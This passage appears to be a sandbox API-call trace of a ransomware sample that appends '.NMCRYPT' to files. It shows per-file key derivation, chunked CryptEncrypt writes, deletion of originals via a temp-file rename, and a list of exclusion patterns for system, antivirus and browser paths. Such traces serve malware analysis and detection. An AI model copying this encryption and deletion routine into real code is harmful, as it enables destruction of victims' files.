dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.374] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.375] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0151.375] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.375] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad338) returned 1 [0151.375] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0151.375] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0151.375] wcslen (_String="\\\\?\\") returned 0x4 [0151.375] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad8b8) returned 1 [0151.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0151.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0151.377] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=3584) returned 1 [0151.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0151.377] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.378] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.378] GetLastError () returned 0x0 [0151.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.575] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.575] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.576] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.576] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.576] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.576] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.576] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.576] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.576] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.576] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.576] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.576] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.576] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.576] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.576] GetLastError () returned 0x0 [0151.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.577] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.577] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.577] GetLastError () returned 0x0 [0151.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.577] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.577] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.577] GetLastError () returned 0x0 [0151.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.577] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.577] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.577] GetLastError () returned 0x0 [0151.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.577] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.577] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.577] GetLastError () returned 0x0 [0151.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.577] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.577] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.577] GetLastError () returned 0x0 [0151.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.577] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.577] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0151.577] GetLastError () returned 0x0 [0151.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0151.578] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0151.578] WriteFile (in: hFile=0x588, lpBuffer=0x2901300*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0151.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui")) returned 0x20 [0151.578] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui", dwFileAttributes=0x20) returned 0 [0151.578] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 1 [0151.578] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui")) returned 0 [0151.578] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" [0151.578] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0151.578] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC31D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc31d.tmp")) returned 0xc31d [0151.581] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC31D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc31d.tmp"), dwFlags=0x1) returned 0 [0151.581] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC31D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc31d.tmp")) returned 1 [0151.581] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0151.581] wcslen (_String="OK") returned 0x2 [0151.581] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.581] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.581] CryptDestroyKey (hKey=0x9ad338) returned 1 [0151.581] CryptDestroyHash (hHash=0x9ad838) returned 1 [0151.581] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0151.581] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*NMCRYPT") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.exe") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.dll") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.lnk") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.bat") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.ini") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.msi") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*.scf") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*AppData*") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0151.581] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\java\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\windows\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*Atheros*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*Realtek*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*bootmgr*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*boot*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*boot*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*IO.SYS*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*ntldr*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*chrome*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*opera*") returned 0 [0151.582] PathMatchSpecW (pszFile="IPSEventLogMsg.dll.mui", pszSpec="*firefox*") returned 0 [0151.582] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", pszSpec="*") returned 1 [0151.582] strlen (_Str="NMoreira") returned 0x8 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: 